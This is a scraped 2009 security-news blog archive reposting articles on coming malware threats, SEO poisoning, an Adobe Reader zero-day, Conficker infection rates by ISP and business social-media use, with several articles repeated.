From: http://debtconsolidation.topnewsdigest.com/2009/12/12-things-computer-users-should-fear-in-2010/
About once a year, computer security news leaps out of the technology section and onto the front page and the top of network news broadcasts.  This year, the day was April Fools' Day, as the Conficker worm became the latest malicious program with the power to eat the Internet.  Somehow, we soldiered on, most of us without ever having to kick on the emergency power generators or dig into that can of spam in the basement shelter.
But Conficker, while no dramatic outbreak, was also no laughing matter to the hundreds of thousands of Web users who were infected.  The problem with the hype cycle in computer security news is that it can have an incremental "cry wolf" effect on computer users.  The odds that the Internet will topple over in 2010 are, once again, quite low.  But serious threats abound and bad guys are mostly still outpacing good guys in our virtual world, which will be slightly more dangerous than this year. Here are 12 reasons why:
1. E-mail attachments are back
The LoveBug and Melissa virus, which did bring the Web to its knees 10 years ago, both used the simplest of delivery mechanisms — an e-mail attachment.  Sure enough, that method stopped working after companies banned attachments and users wised up. Attachment viruses nearly dried up.  Then, a new generation of users came online who hadn't learned the Melissa lesson and older users forgot. So this year, virus writers began dusting off their old methods and — surprise! — they worked again.  Next year, be on guard for unexpected attachments,  says Carl Leonard, head of the Websense threat lab.
"Sometimes you think this stuff has gone away and then it comes back," he said. "We're definitely seeing an uptick in Trojans that come through e-mail." 
2. Anti-virus products less effective
Old-fashioned virus screening tools now catch only about three out of every four viruses through what's called "signature-based" detection, says Martin Lee of Symantec.  Basic anti-virus tools scan all programs using a list of known malicious programs, looking for electronic "signatures."  Virus writers now generate so much malicious software that the good guys just can't keep up. To make matters worse, virus writers are employing a technique known as "polymorphism," so the virus can electronically mutate and evade detection.  That means about 25 percent of viruses can evade detection by scanners. New "heuristic" antivirus software detects malicious programs by watching what they do rather than inspecting what they are, but these products are far from perfect.
Making matters worse, viruses are now more stealthy after infections. Once upon a time, an infection was obvious, thanks to a dramatic slowdown in performance or some other obvious symptom.  Not true today.
"It's become increasingly difficult for people to be aware they've become infected," Lee said. "Often, end users just will not realize something has happened."
With few guarantees for protection, it's more important than ever to keep the kids off music piracy sites and for you to avoid other unsavory Web places — and you know the ones I mean.
3. Fake anti-virus software
Knowing that your antivirus product might not be doing the job, you might be tempted to look online for an alternative, or to try one that surprisingly pops up on your desktop.  That’s a bad idea: It's probably a criminal trying to extort you for money.  The art of selling rogue anti-virus software was perfected in 2009. Leonard says consumers shelled out $150 million for fake antivirus programs last year.
"People are selling malicious software and dressing it up as an antivirus product," he said.  "It surprises me the volume that they are selling. You would think people have become used to seeing these things." 
Obviously not. The Federal Trade Commission did shut down two rogue sellers last year, but not until they allegedly tricked nearly 1 million consumers into downloading their software.
The technique, which works like a charm, will expand next year.
4. Social networking
Facebook-based attacks grew dramatically in 2009, and will continue to increase in the coming year.
There are basically two flavors — viruses that take advantage of the platform's liberal rules for information sharing among applications; and impersonation/identity theft, where a criminal hijacks an innocent user's account and tricks trusted friends and family. But other variations are certain to appear. Criminals can use publicly available information to personalize attacks ("Hey, check out these pictures from Paramus Catholic's Class of 1986!"). Facebook is easily farmed for password-generating information such as "What was your high school mascot?"  And all those "click here" e-mails from Facebook are a Christmas present for would-be phishers, who can easily imitate them.
"People are getting comfortable in social networking situations and I think that they should really re-examine their level of trust and interaction," said Mary Landesman, senior security researcher at ScanSafe. 
And remember, even if Facebook old-timers are too smart for all these tricks, the service is teeming with older newbies.  If you've been friended by mom (or grandma) you know what I mean.  They'll have to endure the Facebook privacy learning curve, too. Be generous.  Spend a few minutes with older relatives this holiday getting them to tighten up their privacy settings.
5. Botnets
The bane of the Internet for the past five years — botnets, or armies of compromised home computers — will remain a problem this year.  And they it may be even worse: botnets have become much more resilient.  Once upon a time, botnets could be disrupted by "cutting off their head," or disabling their command and control computers.  But now, criminals are "building disaster recovery" into the networks, Symantec's Lee said.  That makes them even more difficult to knock off line.
"You must have grudging respect for them and their techniques," Lee said.
6. Spam
Spammers took a body blow during 2009 when the notorious McColo Internet Service Provider was kicked off-line.  The volume of spam plummeted from around 80 percent of all e-mail to 20 percent.  Temporarily.  By year's end, nine out of 10 e-mails were spam, and the number keeps climbing.
"Can it get to 95 percent?," Lee asked, rhetorically. "It never ceases to amaze me how much we put up with this." 
7. Finally, Apple gets respect - from cybercriminals
For years, the worst-kept secret in the computer security world was the safety of using Macintosh computers. It seemed that criminals didn't bother trying to attack Macs. This was no political statement, however. It was merely pragmatism: Apple products were a small target. But with the uptick in Mac market share, the increasingly popularity of Apple's Safari Web browser and the ubiquity of the iPhone, expect criminals to target Steve Jobs’ products, says Leonard.  Already, he says, there have been a handful of iPhone attacks. 
"Malware authors know where people are going," he said. "It's more worthwhile for them to go after these platforms."
8. Cell phones
Speaking of iPhones, 2010 might be the year that we see a significant attack against cell phone or smart phone users. Such an attack has been predicted for years, and has not yet materialized.  But each year, cell phones become more powerful, contain more personal information and are used for more financial transactions. In other words, they become "juicier targets" for criminals, says Lee.  An obvious attack — like something that wipes out phone books — might not be the breakthrough cell phone virus.  Lee says consumers should be on the lookout for a simple automated way to use mobile phones to steal cash. One possibility: some TV shows urge consumers to send text messages at $1 apiece. What happens when a criminal figures out how to redirect such messages, or initiate them?
9. SEO poisoning
You have probably noticed that companies can "game" Google and other search engines, puffing up their search engine results using a series of tricks such as creating fake pages that link heavily to each other.  Annoying, but relatively harmless.  Unfortunately, bad guys have perfected this method and use it to mercilessly attack information seekers every time a large news event occurs. Perhaps hundreds of thousands of users were infected after the death of Michael Jackson through this technique — getting a booby-trapped Web page to rank 5th or 6th on a Google "Michael Jackson" search, even for just a few minutes, is probably the most effective malicious program attack used today. 
"We see this sort of attack daily and especially when a signature event occurs, like Michael Jackson's death," said Leonard. Expect much more next year.  When the next big news hits — however self-serving this may sound — stick with news Web sites you trust.
10. WINDOWS 7
Naturally, as the year progresses, criminals will set their sights on the increasing install base of Windows 7.  Microsoft has continued to improve security and delivery of updates to its flagship operating system.  But there will be problems, no doubt. And then there's this troubling notion: Eight out of 10 existing Windows viruses will run on Windows 7, says Leonard.  Impressive forward-compatibility from the bad guys. For consumers, it means there's no time to be complacent.
11. URL shorteners
Services like bit.ly make sending links through Twitter and e-mail infinitely easier. Unfortunately, it also means criminals can turn obvious troublesome URLs, like https://RomanianDarkLords.Ro/$$$eBay.com into friendly-sounding links like http://bit.ly/5uuWwo.
That makes life easier for criminals, and harder for you, as it takes away one possible hint that a link is trouble.
Websense recently partnered with Bit.ly to help make the process safer. But you should stick with the old rule: Never click on a link you didn't expect, and always manually type URLs into your browser's address bar.
12. Gumblar
Last but not least, Landesman says the most troublesome development of 2009 could be the breakout security problem of 2010. The so-called Gumblar worm used an advanced technique to build a new kind of botnet. Rather than target thousands of home computers, Gumblar attacked Web hosts (Web sites) and turned them into "carriers."  The program managed to download a Web site’s code, inject a hidden malicious program, then reload the now booby-trapped site.  
Because Web sites act as a kind of hub online, they have the potential to spread a serious attack much more quickly. And 10,000 compromised Web sites are much harder to shut down than 10,000 compromised home computers, Landesman said.
Worse yet, a seriously successful Gumblar-style attack could undermine Web users' trust in the Internet. Sites that are one day safe and trustworthy may the next day be dangerous. That would severely hamper security systems that are based on "trusted" sites.
"When you have compromised sites acting as the host itself, the notion of good vs. bad is completely gone," Landesman said.  "Users will find that fewer and fewer sites that they can trust whatever trust they do have could be very fleeting."
Already, Gumblar-infected sites have transmitted code to visiting PCs that redirected all Google searches to pay-per-click Web sites, netting a tidy sum for creators.
Gumblar was declared a bigger problem than Conficker in May by Scansafe, and even though its network of compromised Web sites was eventually tamed during the year, Landesman is convinced that the technique will see many copycats.
"It's one of the attacks we are assured of seeing in large quantities in 2010," she said.
Welcome to the Proxy Update, your source of news and information on Proxies and their role in network security.
Wednesday, December 23, 2009
Tuesday, December 22, 2009
Business Use of Social Media Surges
From: http://www.marketingprofs.com/charts/2009/3267/business-use-of-social-media-surges
The use of Facebook, Twitter, and blogs for business purposes has skyrocketed in the last six months—with indications of wider adoption and more frequent sessions, according to research by Palo Alto Networks into application traffic patterns of computer networks.
Facebook is the dominant social networking site in the workplace: 94% of companies used Facebook over the past six months (ended September 2009), compared with 37% six months ago, finds the Application Usage and Risk Report (Fall Edition, 2009).
Sessions consumed per organization by Facebook users increased 192% during the period, while bandwidth consumption jumped 294% to 6.3GB per organization, indicating more frequent or longer periods of use, Palo Alto Networks found.
Below, additional findings from the study.
The prevalence of LinkedIn among business users increased to 89%, compared with 35% six months ago. Bandwidth consumption declined 42%, however, and session consumption declined 22%, indicating less frequent or shorter periods of use.
Twitter is the most popular instant messaging application in the workplace: 89% of companies used Twitter, compared with 35% six months ago.
Sessions consumed per organization by Twitter users increased 252% over the previous six months, indicating more frequent periods of use, while bandwidth consumption jumped 775% to 184 MB per organization, even though tweets are limited to just 140 characters.
Facebook Mail and Facebook Chat applications have become the fourth most commonly used applications within their respective categories. Interestingly, though Facebook Chat was released in April 2008, in a mere 18 months it has become more widely used than Yahoo IM and AIM (within this sample).
Business users are significantly more active than six months ago in their blogging and posting activity. In addition to the frequency with which these applications were found, overall activity increased from several perspectives. The number of application variants found more than doubled to 23, from 11 just six months ago. In addition, total session activity increased by a factor of 39 while total bandwidth consumption increased by a factor of 48.
The adoption of these applications and other enterprise 2.0 applications, in general, is driven by end users rather than IT departments, while pace of adoption is a result of the ease with which they can be accessed, the study finds.
Other key findings:
* 82% of companies use Google Docs, Google's Internet-based suite of document programs, compared with 33% of companies in six months ago.
* Not only was Google Docs found more frequently, both the sessions and bandwidth consumed per organization increased approximately 290% over the previous six months.
* 82% of companies use Adobe-Connect for Internet conferencing compared with 35% six months ago.
* 59% of companies use WebEx conferencing, up from 33% six months ago.
About the data: Published by Palo Alto Networks, the Application Usage and Risk Report (Fall Edition, 2009) summarizes the application traffic patterns, between March and September 2009, of more than 200 organizations' systems networks worldwide, across nine industry categories.
The use of Facebook, Twitter, and blogs for business purposes has skyrocketed in the last six months—with indications of wider adoption and more frequent sessions, according to research by Palo Alto Networks into application traffic patterns of computer networks.
Facebook is the dominant social networking site in the workplace: 94% of companies used Facebook over the past six months (ended September 2009), compared with 37% six months ago, finds the Application Usage and Risk Report (Fall Edition, 2009).
Sessions consumed per organization by Facebook users increased 192% during the period, while bandwidth consumption jumped 294% to 6.3GB per organization, indicating more frequent or longer periods of use, Palo Alto Networks found.
Below, additional findings from the study.
The prevalence of LinkedIn among business users increased to 89%, compared with 35% six months ago. Bandwidth consumption declined 42%, however, and session consumption declined 22%, indicating less frequent or shorter periods of use.
Twitter is the most popular instant messaging application in the workplace: 89% of companies used Twitter, compared with 35% six months ago.
Sessions consumed per organization by Twitter users increased 252% over the previous six months, indicating more frequent periods of use, while bandwidth consumption jumped 775% to 184 MB per organization, even though tweets are limited to just 140 characters.
Facebook Mail and Facebook Chat applications have become the fourth most commonly used applications within their respective categories. Interestingly, though Facebook Chat was released in April 2008, in a mere 18 months it has become more widely used than Yahoo IM and AIM (within this sample).
Business users are significantly more active than six months ago in their blogging and posting activity. In addition to the frequency with which these applications were found, overall activity increased from several perspectives. The number of application variants found more than doubled to 23, from 11 just six months ago. In addition, total session activity increased by a factor of 39 while total bandwidth consumption increased by a factor of 48.
The adoption of these applications and other enterprise 2.0 applications, in general, is driven by end users rather than IT departments, while pace of adoption is a result of the ease with which they can be accessed, the study finds.
Other key findings:
* 82% of companies use Google Docs, Google's Internet-based suite of document programs, compared with 33% of companies in six months ago.
* Not only was Google Docs found more frequently, both the sessions and bandwidth consumed per organization increased approximately 290% over the previous six months.
* 82% of companies use Adobe-Connect for Internet conferencing compared with 35% six months ago.
* 59% of companies use WebEx conferencing, up from 33% six months ago.
About the data: Published by Palo Alto Networks, the Application Usage and Risk Report (Fall Edition, 2009) summarizes the application traffic patterns, between March and September 2009, of more than 200 organizations' systems networks worldwide, across nine industry categories.
Monday, December 21, 2009
Beware of bad Google search results
From: http://www.eastvalleytribune.com/story/148583
Q. Someone told me that I can't trust Google search results anymore because of hackers. Is this true? - Randal
A. Google has built its empire on a very simple concept: be relevant.
When you search for something on Google, their system for weeding out irrelevant Web sites for any given search phrase has been their "secret sauce" and allowed them to dominate in the world of search.
They process more than 150 million search requests per day, making them far and away the most popular search engine on the planet.
But any technology that attracts that many users will attract those with malicious intent who will focus all their energies on finding ways to exploit those users.
Google is constantly working on ways to deal with something called "SEO poisoning" that is allowing hackers to get malicious Web sites listed, sometimes on the first page of popular Google searches.
SEO stands for "search engine optimization" and is a process used to optimize a Web site for the highest possible ranking in search engines. The closer to the first position in the search results you can get, the more people who will click on it.
Most folks feel comfortable with the search results from Google, never giving any thought to whether a link is safe or not. Most assume that if Google presents it as a result, it must be safe.
Unfortunately, those days are long gone. The bad guys have figured out how to sneak malicious Web sites into Google's results - and they've been doing it for some time.
The most common search terms that are being targeted (but not the only ones) are very current events - things like "swine flu" or "Tiger Woods mistress" that generate a large number of searches in a very short period of time.
The scammers either quickly create Web sites that are rigged with hidden malware and are optimized to rank highly for these breaking events, or they will compromise a legitimate Web site that is highly optimized for these types of searches.
Researchers have found that as many as 50 percent of the top search results on the first few pages of a Google search for fast-breaking stories are laced with malicious links.
And just recently, the malware writers started targeting folks that click on the Google "Doodle," which is usually a date-specific image that graces the Google logo above the search box. It could be an image of Santa Claus on Christmas, Christopher Columbus on Columbus day, etc., which if clicked generates a search for the subject being represented by the imagery.
Most recently, the "Esperanto flag" displayed on the 150th anniversary of founder L.L. Zamenhoff's birthday was targeted and resulted in 27 of the first 50 results containing some form of malware, according to a research scientist at Barracuda Networks.
As a result of these tricks, a number of companies have created programs such as McAfee's Site Advisor or Norton's Site Safety that can help the average user avoid being exploited by stepping in and warning them. Two of my favorites are actually free and easy to use. The first is K9 Web Protection (www.K9WebProtection.com), which is a solid parental control program that also does a great job of blocking access to Web sites that have suspicious coding on them. If you don't want or need the parental controls, you can turn them off and just use the malware protection, which is one of the best I've tested.
The other is a plug-in to most popular browsers called Web Of Trust (www.mywot.com) that uses the entire community of users to help warn others of suspicious sites. The warnings extend beyond malware to warn against sites that might have adware, phishing attacks, browser exploits, Internet fraud and spam. But because the ratings are user-based, it will have more false positives.
Households with children - especially teenagers who tend to have no fear of clicking on anything - should strongly consider using one of the many tools for warning against or blocking malicious sites and have a frank discussion about this fast-growing way of getting infected online.
Q. Someone told me that I can't trust Google search results anymore because of hackers. Is this true? - Randal
A. Google has built its empire on a very simple concept: be relevant.
When you search for something on Google, their system for weeding out irrelevant Web sites for any given search phrase has been their "secret sauce" and allowed them to dominate in the world of search.
They process more than 150 million search requests per day, making them far and away the most popular search engine on the planet.
But any technology that attracts that many users will attract those with malicious intent who will focus all their energies on finding ways to exploit those users.
Google is constantly working on ways to deal with something called "SEO poisoning" that is allowing hackers to get malicious Web sites listed, sometimes on the first page of popular Google searches.
SEO stands for "search engine optimization" and is a process used to optimize a Web site for the highest possible ranking in search engines. The closer to the first position in the search results you can get, the more people who will click on it.
Most folks feel comfortable with the search results from Google, never giving any thought to whether a link is safe or not. Most assume that if Google presents it as a result, it must be safe.
Unfortunately, those days are long gone. The bad guys have figured out how to sneak malicious Web sites into Google's results - and they've been doing it for some time.
The most common search terms that are being targeted (but not the only ones) are very current events - things like "swine flu" or "Tiger Woods mistress" that generate a large number of searches in a very short period of time.
The scammers either quickly create Web sites that are rigged with hidden malware and are optimized to rank highly for these breaking events, or they will compromise a legitimate Web site that is highly optimized for these types of searches.
Researchers have found that as many as 50 percent of the top search results on the first few pages of a Google search for fast-breaking stories are laced with malicious links.
And just recently, the malware writers started targeting folks that click on the Google "Doodle," which is usually a date-specific image that graces the Google logo above the search box. It could be an image of Santa Claus on Christmas, Christopher Columbus on Columbus day, etc., which if clicked generates a search for the subject being represented by the imagery.
Most recently, the "Esperanto flag" displayed on the 150th anniversary of founder L.L. Zamenhoff's birthday was targeted and resulted in 27 of the first 50 results containing some form of malware, according to a research scientist at Barracuda Networks.
As a result of these tricks, a number of companies have created programs such as McAfee's Site Advisor or Norton's Site Safety that can help the average user avoid being exploited by stepping in and warning them. Two of my favorites are actually free and easy to use. The first is K9 Web Protection (www.K9WebProtection.com), which is a solid parental control program that also does a great job of blocking access to Web sites that have suspicious coding on them. If you don't want or need the parental controls, you can turn them off and just use the malware protection, which is one of the best I've tested.
The other is a plug-in to most popular browsers called Web Of Trust (www.mywot.com) that uses the entire community of users to help warn others of suspicious sites. The warnings extend beyond malware to warn against sites that might have adware, phishing attacks, browser exploits, Internet fraud and spam. But because the ratings are user-based, it will have more false positives.
Households with children - especially teenagers who tend to have no fear of clicking on anything - should strongly consider using one of the many tools for warning against or blocking malicious sites and have a frank discussion about this fast-growing way of getting infected online.
Sunday, December 20, 2009
Zero-day vulnerability threatens Adobe users
From Network World this week:
Adobe is investigating possible vulnerabilities in its Reader and Acrobat applications that could allow an attacker to execute malicious code on Windows machines and completely compromise them.
Adobe issued a notification on a blog signaling it's preparing a response regarding claims that its Reader and Acrobat versions 9.2 and earlier are vulnerable to an attack via a malicious PDF. Symantec senior researcher Ben Greenbaum has been in touch with Adobe since Monday on the issue, adding Symantec has updated its security software to defend against this latest threat.
"We were contacted by a researcher who discovered the attack being exploited in the wild," Greenbaum says. "It's mostly targeted e-mail.”
The attack would include the malicious PDF as an e-mail attachment to the victim, and the malicious code would execute on any unprotected Windows machine when the recipient clicked on it.
A successful attack could entirely compromise the victim's machine, and it's likely this is being used to try and spread botnet code, Greenbaum notes. He adds that there are other possible methods that could be used to disseminate the malicious PDF attack code, including downloading the code from the Internet.
Adobe Tuesday indicated it will make statements related to Adobe Reader and Adobe Acrobat and this latest threat at its security information alert blog.
Adobe is investigating possible vulnerabilities in its Reader and Acrobat applications that could allow an attacker to execute malicious code on Windows machines and completely compromise them.
Adobe issued a notification on a blog signaling it's preparing a response regarding claims that its Reader and Acrobat versions 9.2 and earlier are vulnerable to an attack via a malicious PDF. Symantec senior researcher Ben Greenbaum has been in touch with Adobe since Monday on the issue, adding Symantec has updated its security software to defend against this latest threat.
"We were contacted by a researcher who discovered the attack being exploited in the wild," Greenbaum says. "It's mostly targeted e-mail.”
The attack would include the malicious PDF as an e-mail attachment to the victim, and the malicious code would execute on any unprotected Windows machine when the recipient clicked on it.
A successful attack could entirely compromise the victim's machine, and it's likely this is being used to try and spread botnet code, Greenbaum notes. He adds that there are other possible methods that could be used to disseminate the malicious PDF attack code, including downloading the code from the Internet.
Adobe Tuesday indicated it will make statements related to Adobe Reader and Adobe Acrobat and this latest threat at its security information alert blog.
Saturday, December 19, 2009
3 Basic Steps to Avoid Joining a Botnet
Network World recently ran an article title "3 Basic Steps to Avoid Joining a Botnet".  Their recommendations were:
While all these are good tips, they are all targeted at your end-user. As an IT admin, we all know how difficult it is to convince an end-user to follow tips like these.
That's why it's also important to have a proxy in the network acting as secure web gateway to protect end-users from as much malware as possible. It's just as important to keep the proxy up to date with the latest anti-malware software and OS versions.
Tip 1: Have work AND home machines regularly updated with patches and antivirus software
Tip 2: Use the latest browser versions
Tip 3: Be a little more careful when you get a link or an attachment.
While all these are good tips, they are all targeted at your end-user. As an IT admin, we all know how difficult it is to convince an end-user to follow tips like these.
That's why it's also important to have a proxy in the network acting as secure web gateway to protect end-users from as much malware as possible. It's just as important to keep the proxy up to date with the latest anti-malware software and OS versions.
Friday, December 18, 2009
Chinese ISP hosts 1 in 7 Conficker infections
From Network World:
China Telecom's Chinanet seems to have been hit hardest, says Shadowserver
By Robert McMillan, IDG News Service
December 17, 2009 03:41 AM ET
Security experts have known for months that some countries have had a harder time battling the Conficker worm than others. But thanks to data released Wednesday by Shadowserver, a volunteer-run organization, they now have a better idea of which Internet Service Providers have the biggest problem.
In terms of the total number of infected computers, China Telecom's Chinanet seems to have been hardest hit by the worm, which began spreading late last year.
The Chinese ISP had more than 1 million infected systems within its massive 94 million IP address network. That amounts to just over 1 percent of the company's network. But while Chinanet has the most total infections -- amounting to about 14 percent of all known copies of the worm -- it doesn't have the highest percentage of infected systems. Other, smaller ISPs show up on Shadowserver's list with infection rates as high as 25 percent.
"There's definitely a challenge at the ISP level with remediation," said Andre DiMino one of Shadowserver's founders.
Conficker got a lot of attention earlier in the year, including a late March segment on the 60 Minutes television program warning of an April 1 upgrade to the worm. Because Conficker is the most widespread botnet ever reported, security experts worry that it could be used to launch an unprecedented denial of service attack.
But, despite its size, the network of hacked computers has been associated with very little malicious activity. That's given computer users a false sense of security, DiMino said.
"The rate of remediation is not as good as we would have liked," he said. "The awareness and the alarm about Conficker kind of faded out after April 1st because nothing really dramatic happened."
Some ISPs, such as U.S.-based Comcast have taken to notifying users when their computers are infected or offering them free security software so they can get cleaned up. Comcast had a 0.05 percent infection rate, according to Shadowserver's numbers. AT&T was measured at 0.02 percent.
The top two ISPs on Shadowserver's list, China Telecom and China Unicom (with 472,892 infected IPs) did not have any immediate official comment on the Conficker infections, but customer support reps for both companies said that helping customers with virus problems is outside of the scope of their service.
China Telecom's Chinanet seems to have been hit hardest, says Shadowserver
By Robert McMillan, IDG News Service
December 17, 2009 03:41 AM ET
Security experts have known for months that some countries have had a harder time battling the Conficker worm than others. But thanks to data released Wednesday by Shadowserver, a volunteer-run organization, they now have a better idea of which Internet Service Providers have the biggest problem.
In terms of the total number of infected computers, China Telecom's Chinanet seems to have been hardest hit by the worm, which began spreading late last year.
The Chinese ISP had more than 1 million infected systems within its massive 94 million IP address network. That amounts to just over 1 percent of the company's network. But while Chinanet has the most total infections -- amounting to about 14 percent of all known copies of the worm -- it doesn't have the highest percentage of infected systems. Other, smaller ISPs show up on Shadowserver's list with infection rates as high as 25 percent.
"There's definitely a challenge at the ISP level with remediation," said Andre DiMino one of Shadowserver's founders.
Conficker got a lot of attention earlier in the year, including a late March segment on the 60 Minutes television program warning of an April 1 upgrade to the worm. Because Conficker is the most widespread botnet ever reported, security experts worry that it could be used to launch an unprecedented denial of service attack.
But, despite its size, the network of hacked computers has been associated with very little malicious activity. That's given computer users a false sense of security, DiMino said.
"The rate of remediation is not as good as we would have liked," he said. "The awareness and the alarm about Conficker kind of faded out after April 1st because nothing really dramatic happened."
Some ISPs, such as U.S.-based Comcast have taken to notifying users when their computers are infected or offering them free security software so they can get cleaned up. Comcast had a 0.05 percent infection rate, according to Shadowserver's numbers. AT&T was measured at 0.02 percent.
The top two ISPs on Shadowserver's list, China Telecom and China Unicom (with 472,892 infected IPs) did not have any immediate official comment on the Conficker infections, but customer support reps for both companies said that helping customers with virus problems is outside of the scope of their service.
Thursday, December 17, 2009
Cisco / Ironport integration goes one step further
Ironport has announced that its support website has moved under Cisco's support website today.  Anyone using the Ironport website for support will now have to get a Cisco support login, and visit the support resources at that location.
It appears the Ironport acquisition is now almost fully complete at Cisco.
It appears the Ironport acquisition is now almost fully complete at Cisco.
Wednesday, December 16, 2009
Blue Coat starts a security blog
Blue Coat Systems, started up a new security blog, in addition to the security alerts they already send out to their customers.  For those that are interested in hearing what Blue Coat's top engineers and product managers have to say about the latest security threats, you can visit their security landing page to read the blog, see the security alerts, and view some graphical information about the latest malware threats.
Sunday, December 13, 2009
Vulnerability Management: The Missing Link In Mobile Device Security
From: Dark Reading
If you're not in the office these days, then chances are you've brought the office with you. From laptop computers to smartphones, mobile devices are becoming standard issue in business. But the security of those devices is a lot less certain.
According to market analysis firm Gartner, global smartphone sales in the first quarter of 2009 were 36.4 million units, an increase of 12.7 percent compared to the same quarter in 2008. For many organizations, though, enterprise adoption of smartphones as an application platform has been slowed by concerns about basic security -- and the absence of clearly defined methods for performing vulnerability management on the small devices.
"We have seen huge interest from customers who are interested in protecting smartphones so they can deploy them as IP phones or terminals -- and the only reason they aren't [deploying the devices] is vulnerability management," says Ravi Varanasi, vice president of engineering with security system vendor Sipera.
Varanasi, who was one of the developers of Cisco's network access control (NAC) technology, says vulnerability management is the missing piece in mobile device security. "If we can solve the problem, I think it will be a free-for-all in the marketplace," he says. If technologists can improve solutions for mobile device user identity, authentication, and encryption, Varanasi adds, then the smartphone market could skyrocket even faster.
For most organizations, one of the issues in vulnerability management is that a relationship with a network service provider is usually required for deployment. Jonathon Gordon, director of marketing for Allot Communications, notes "providers are starting to be able to provide clean lines, cleaned of spam and viruses, and behind a firewall. This is starting to be offered to corporations, and down the line, these will be available with a [service-level agreement] attached."
Gordon says a growing reliance on smartphones, in particular, will lead to more comprehensive security partnerships with the network providers.
"There is a case for pushing some security features up the line, so the enterprise doesn't have to deal with them itself. They would be ubiquitous, whether [the service is] on the mobile or the fixed side," he says. "If [enterprises] rely on mobile devices as much as fixed devices, they assume they get the same service whether it's fixed or mobile. That's the underlying assumption going forward -- the expectations for mobile are that more and more people will expect it to work just as fixed wired networking does."
Choosing Their Battles
For now, however, most organizations are more worried about protecting the data on their devices than about the devices themselves, says Derek Brink, vice president and research fellow in the IT security practice at market research firm Aberdeen.
"From previous studies, I've seen it be much more about the data than about the vulnerabilities on a platform basis," Brink says. "These mobile devices are platforms in their own rights, and I think in the long term they'll be just as vulnerable to attacks as the desktop. The data that flows out to the device and is stored on the device is the highest priority."
Ultimately, though, Brink says traditional concepts of vulnerability management will become an important part of managing mobile devices. "The vulnerabilities are starting to appear, and it's not as big as the traditional platform market, but the data issue is here today, and people are concerned," he says. "In the future and ongoing, it will be the same group of issues dealt with -- whether the network is wireless or cable-connected."
Sipera's Varanasi says as the concerns of mobile and fixed assets converge, there will also be special security issues for mobile devices.
"It's not just the status of security software, but an application awareness that we need to know before we allow the phone on the network," he says. "If [the user is] running Skype, for example, we want to know about it before we allow the phone onto the network. The span of the application is very critical for the network asset. Essentially we call it CAC [call admission control], and we assess the posture of the phone, make sure it runs the proper SIP stack, and make sure it's enabled for secure and authenticated communication."
The process of managing vulnerabilities in mobile devices will become increasingly complex, just as it did in the wired world, experts say. The question for many organizations today is whether the process will grow to cover a fleet of devices that expands slowly -- or explodes as employees are allowed to bring their own phones into the corporate fold.
If you're not in the office these days, then chances are you've brought the office with you. From laptop computers to smartphones, mobile devices are becoming standard issue in business. But the security of those devices is a lot less certain.
According to market analysis firm Gartner, global smartphone sales in the first quarter of 2009 were 36.4 million units, an increase of 12.7 percent compared to the same quarter in 2008. For many organizations, though, enterprise adoption of smartphones as an application platform has been slowed by concerns about basic security -- and the absence of clearly defined methods for performing vulnerability management on the small devices.
"We have seen huge interest from customers who are interested in protecting smartphones so they can deploy them as IP phones or terminals -- and the only reason they aren't [deploying the devices] is vulnerability management," says Ravi Varanasi, vice president of engineering with security system vendor Sipera.
Varanasi, who was one of the developers of Cisco's network access control (NAC) technology, says vulnerability management is the missing piece in mobile device security. "If we can solve the problem, I think it will be a free-for-all in the marketplace," he says. If technologists can improve solutions for mobile device user identity, authentication, and encryption, Varanasi adds, then the smartphone market could skyrocket even faster.
For most organizations, one of the issues in vulnerability management is that a relationship with a network service provider is usually required for deployment. Jonathon Gordon, director of marketing for Allot Communications, notes "providers are starting to be able to provide clean lines, cleaned of spam and viruses, and behind a firewall. This is starting to be offered to corporations, and down the line, these will be available with a [service-level agreement] attached."
Gordon says a growing reliance on smartphones, in particular, will lead to more comprehensive security partnerships with the network providers.
"There is a case for pushing some security features up the line, so the enterprise doesn't have to deal with them itself. They would be ubiquitous, whether [the service is] on the mobile or the fixed side," he says. "If [enterprises] rely on mobile devices as much as fixed devices, they assume they get the same service whether it's fixed or mobile. That's the underlying assumption going forward -- the expectations for mobile are that more and more people will expect it to work just as fixed wired networking does."
Choosing Their Battles
For now, however, most organizations are more worried about protecting the data on their devices than about the devices themselves, says Derek Brink, vice president and research fellow in the IT security practice at market research firm Aberdeen.
"From previous studies, I've seen it be much more about the data than about the vulnerabilities on a platform basis," Brink says. "These mobile devices are platforms in their own rights, and I think in the long term they'll be just as vulnerable to attacks as the desktop. The data that flows out to the device and is stored on the device is the highest priority."
Ultimately, though, Brink says traditional concepts of vulnerability management will become an important part of managing mobile devices. "The vulnerabilities are starting to appear, and it's not as big as the traditional platform market, but the data issue is here today, and people are concerned," he says. "In the future and ongoing, it will be the same group of issues dealt with -- whether the network is wireless or cable-connected."
Sipera's Varanasi says as the concerns of mobile and fixed assets converge, there will also be special security issues for mobile devices.
"It's not just the status of security software, but an application awareness that we need to know before we allow the phone on the network," he says. "If [the user is] running Skype, for example, we want to know about it before we allow the phone onto the network. The span of the application is very critical for the network asset. Essentially we call it CAC [call admission control], and we assess the posture of the phone, make sure it runs the proper SIP stack, and make sure it's enabled for secure and authenticated communication."
The process of managing vulnerabilities in mobile devices will become increasingly complex, just as it did in the wired world, experts say. The question for many organizations today is whether the process will grow to cover a fleet of devices that expands slowly -- or explodes as employees are allowed to bring their own phones into the corporate fold.
Saturday, December 12, 2009
Malware Threats Double in 2009
Trend Micro and AVTest.org are both reporting a huge increase in malware.  
Malware threats have undergone many, many stages of evolution over the years. First it was DOS viruses, then macro viruses, then mass-mailers, then botnets, then Web threats… the only constants seem to be that these are growing both in number and in danger.
TrendLabs has seen this continued growth of malware. The effects on users is clear: in the first six months of 2008, the Trend Micro World Virus Tracking Center (WTC) recorded that 253.4 million systems were infected with malware. The comparable volume for 2009 is almost double at 491.2 million.
While not a welcome development, this wasn’t unexpected either. The official 2009 Trend Micro forecast pointed out that malware threats had been growing for years, and 2009 was going to see more of the same.
It’s not just limited to Trend Micro, either. AV-Test.org has released their findings for the first half of the year recently, with similar results. Both organizations expect the growth to continue, with little relief in sight.
Malware threats have undergone many, many stages of evolution over the years. First it was DOS viruses, then macro viruses, then mass-mailers, then botnets, then Web threats… the only constants seem to be that these are growing both in number and in danger.
TrendLabs has seen this continued growth of malware. The effects on users is clear: in the first six months of 2008, the Trend Micro World Virus Tracking Center (WTC) recorded that 253.4 million systems were infected with malware. The comparable volume for 2009 is almost double at 491.2 million.
While not a welcome development, this wasn’t unexpected either. The official 2009 Trend Micro forecast pointed out that malware threats had been growing for years, and 2009 was going to see more of the same.
